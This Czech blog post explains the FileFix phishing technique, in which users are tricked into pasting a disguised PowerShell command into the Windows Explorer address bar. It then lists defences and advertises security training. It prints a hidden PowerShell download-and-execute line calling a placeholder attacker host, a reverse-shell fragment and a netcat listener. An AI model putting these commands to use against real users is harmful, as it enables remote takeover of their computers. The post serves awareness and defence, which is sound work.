Autorem původního příspěvku je Vojtěch Frnka z BOIT Cyber Security. Myslím, že článek má i zde své místo a tak lehce upravenou verzi dávám i sem.
Představte si scénář, kdy vám dorazí e-mail, který vypadá jako klasická interní zpráva z HR oddělení:
„Ahoj, tady je aktualizovaná verze směrnice k práci z domova. Kvůli změně přístupů ji prosím otevři přes Průzkumníka na:
\\intranet.local\hr\WorkPolicy.docx“
Na první pohled nic podezřelého. Jen zkopírovat cestu a vložit do Průzkumníka Windows. Jenže tahle nevinně vypadající výzva může spustit PowerShell skript… a útočník tak získá přístup k počítači.
Vítejte ve světě FileFix – chytré a přitom extrémně jednoduché techniky sociálního inženýrství, která zneužívá důvěru uživatelů a schopnosti Windows Průzkumníka.
Co je FileFix?
FileFix je útočná technika inspirovaná původním konceptem od bezpečnostního výzkumníka mrd0x, autora známého útoku ClickFix.
Zatímco ClickFix cílí na dialog Win + R, FileFix zneužívá adresní řádek Průzkumníka souborů – ten totiž dokáže spouštět PowerShell příkazy podobně jako klasický terminál.
A co je na tom nejděsivější?
- 🔒 Nejsou potřeba žádná zranitelná místa.
- 👨💻 Není potřeba admin oprávnění.
- 🧨 Nejde o malware.
Stačí důvěřivý uživatel a dobře připravený phishing.
Jak útok FileFix funguje?
1️⃣ Phishingová stránka
Útočník připraví falešnou stránku, např. kopii intranetu nebo SharePointu. Ta obsahuje:
- instrukce typu „Zkopírujte cestu a otevřete ji v Průzkumníku“
- tlačítko „Zkopírovat cestu“
- prvek (např. input), který uživatele navede k otevření Průzkumníka

2️⃣ Zkopírování PowerShell příkazu
Tlačítko ve skutečnosti do schránky zkopíruje PowerShell příkaz, např.:
powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker-ip/rev.ps1') # C:\internal\HRPolicy.docx"
3️⃣ Uživatel spustí „cestu“ v Průzkumníku
Po vložení do adresního řádku a stisknutí Enter se příkaz na pozadí spustí, a útočník získá přístup – třeba pomocí reverzního shellu.
Ukázka reverzního shellu
Soubor rev.ps1 může vypadat takto:
$client = New-Object System.Net.Sockets.TCPClient("attacker-ip", 4444); # ...
Útočník čeká na spojení pomocí Netcat:
bash nc -lvnp 4444
Hosting & HTTPS
Aby clipboard API fungovalo, stránka musí běžet na HTTPS. Varianty:
- GitHub Pages
- Netlify / Vercel
- Lokálně pomocí
servea self-signed certifikátu
Obrana proti FileFix útoku
🔐 1. Edukace
Uživatelé musí chápat, že:
- i „cesta“ může spustit skript
- adresní řádek Průzkumníka není bezpečný prostor
🕵️ 2. Detekce clipboardu
Některé EDR nástroje (např. SentinelOne, CrowdStrike) umí odhalit podezřelou aktivitu se schránkou.
🛑 3. Blokování PowerShellu
Pomocí politik (např. AppLocker, WDAC, Applimit) lze omezit možnosti spuštění skriptů.
🚫 4. DNS/URL filtr
Aktualizované blacklisty, DNS filtering, firewall pravidla…
Co s tím v praxi?
Na podobné triky pravidelně upozorňujeme během našich školení kyberbezpečnosti. Ukazujeme:
- jak útoky fungují
- jak je odhalit v běžném provozu
- jak naučit zaměstnance odolat
👉 Zajímá vás, jak by na FileFix zareagovali vaši lidé?
Uděláme pro vás simulovaný phishingový test s tímto (a dalšími) scénáři.
📌 ➡ Etická phishingová kampaň od BOIT Cyber Security
📌 ➡ Kyberbezpečnostní školení pro zaměstnance
Tady nejde o sci-fi. Tohle je realita každodenního provozu firem i domácností.
🔥 Čaj, všiml/a sis, že tenhle web je bez reklam? 🤔 💸 Nesbírám a neprodávám data návštěvníků. 💸 🕵️♂️ Respektuji Vaše soukromí. 🕵️♂️ 🌎 Píšu pro dobro lidstva. 🌎 ❤️ Líbil se ti článek? ❤️
Nebo pošli BTC:bc1qzcu2325kc89lx7zf07vaud8yqx04aemu8aygguZjistěte více z Spajkovo postřehy z kyberprostoru 👾
Přihlaste se k odběru a dostávejte nejnovější příspěvky do své e-mailové schránky.
